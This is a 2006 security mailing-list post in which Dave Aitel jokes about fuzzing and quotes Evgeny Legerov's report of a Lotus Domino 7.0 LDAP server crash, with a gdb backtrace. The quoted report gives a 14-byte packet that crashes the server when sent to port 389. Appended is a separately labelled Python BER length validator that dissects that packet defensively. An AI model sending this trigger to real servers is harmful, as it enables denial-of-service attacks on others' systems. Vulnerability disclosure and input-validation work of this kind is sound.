[Dailydave] ProtoVer vs Lotus Domino Server 7.0
Dave Aitel
dave.aitel at gmail.com
Sat Feb 4 13:36:49 EST 2006
Ah, the smell of 0day in the morning. There's nothing like it! It's like a
New Zealand sauvignon blanc, the Sticky Fingers bakery early in the morning,
or the bum who sleeps outside of Wild Oats, drunk off of month-old organic
groceries.
One of the reporters on this list should do a paper on "why do fuzzers still
work?" Surely if you're implementing a complex protocol of some sort and you
follow this newfangled "test driven development" fad, then clearly you've
written a few fuzzers in your time. But as Evgeny's latest entry shows:
fuzzers are still more fun than a botnet on all of your ex's computers.
Well, maybe not MORE fun. But nearly as fun. Well, pretty damn fun, anyway.
In my opinion, the main benefit to writing your own fuzzer as opposed to
using SPIKE is that you do get that multi-dimensionality that !Dmitry made
fun of in his weblog entry. Of course, the downside to not using SPIKE is
that it takes quite a bit of time and effort, and hence, these sorts of
things tend to cost some cash.
But that doesn't explain why Microsoft's HTTP fuzzer is clearly not as up to
speed as Tom Ferris's. When is Steve going to knock some heads on this one?
Probably sometime last week, right after the POC came out. Ah, to be a fly on
the wall of that conference room. 'Cause getting schooled by people who work
for free is so... well, let's just say it doesn't happen to Marines very
often.
-dave
On 2/3/06, Evgeny Legerov <admin at gleg.net> wrote:
>
> Hi,
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1721508944 (LWP 17444)]
> 0x08068579 in CLDAPProtocol::StateBind ()
> (gdb) bt
> #0 0x08068579 in CLDAPProtocol::StateBind ()
> #1 0x0805c413 in CLDAPProtocol::Run ()
> #2 0x0809523c in CBaseTask::StateMachine ()
> #3 0x0805a12d in CLDAPSrv::OnConnect ()
> #4 0x08092618 in CIServ::ServerTaskProtocolMachine ()
> #5 0x08091d1a in CIServ::ServerTaskIOCP ()
> #6 0x08090dc8 in ServerThread ()
> #7 0x9ff49826 in ThreadWrapper () from /opt/ibm/lotus/notes/latest/linux/libnotes.so
> #8 0x9fdfab80 in start_thread () from /lib/libpthread.so.0
> #9 0x9fc9ddee in clone () from /lib/libc.so.6
> (gdb) x/i $eip
> 0x8068579 <_ZN13CLDAPProtocol9StateBindEv+749>: cmpb $0x0,0x0
>
> To trigger, send the following data to port 389:
> """
> 30 0c 02 01 01 60 07 02 00 03 04 00 80 00
> """
>
> Best regards,
> Evgeny Legerov
> CEO, GLEG Ltd.
>
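What the 14 bytes quoted above look like to a BER decoder that refuses to trust declared lengths, as an added example that is not part of the thread or of any Domino code. My reading of the bytes (an assumption, not stated in the post) is a version-3 BindRequest whose version INTEGER has had its length byte zeroed, so the next element's length then overruns the enclosing BindRequest; the walker below reports both defects, which is the validation a hardened LDAP front end wants before it hands anything to bind handling. Function names are mine.

```python
# Added example, not from the original thread. Minimal BER TLV walker that
# validates lengths instead of trusting them. Tag numbers follow LDAPv3
# (RFC 2251): 0x30 SEQUENCE, 0x60 [APPLICATION 0] BindRequest, 0x02 INTEGER.

# Constructed from the hex string in Evgeny's message.
TRIGGER = bytes.fromhex("30 0c 02 01 01 60 07 02 00 03 04 00 80 00")

def read_length(buf, pos):
    """Return (length, next_pos) for a BER definite-form length at buf[pos]."""
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    n = first & 0x7F
    if n == 0 or n > 4 or pos + 1 + n > len(buf):
        raise ValueError(f"bad long-form length at offset {pos}")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n

def walk(buf, start=0, end=None, problems=None):
    """Walk the TLVs in buf[start:end]; collect structural problems as strings."""
    problems = [] if problems is None else problems
    end = len(buf) if end is None else end
    pos = start
    while pos < end:
        tag = buf[pos]
        if pos + 1 >= end:
            problems.append(f"offset {pos}: tag 0x{tag:02x} with no length byte")
            break
        length, body = read_length(buf, pos + 1)
        if body + length > end:
            over = body + length - end
            problems.append(f"offset {pos}: tag 0x{tag:02x} length {length} "
                            f"overruns enclosing element by {over}")
            break
        if tag == 0x02 and length == 0:
            # A BER INTEGER must carry at least one content octet.
            problems.append(f"offset {pos}: zero-length INTEGER")
        if tag & 0x20:  # constructed: recurse into SEQUENCE / BindRequest
            walk(buf, body, body + length, problems)
        pos = body + length
    return problems

if __name__ == "__main__":
    for p in walk(TRIGGER):
        print(p)
```

For comparison, the same bytes with `02 00 03` corrected to `02 01 03` decode cleanly as version 3, empty name, empty simple authentication.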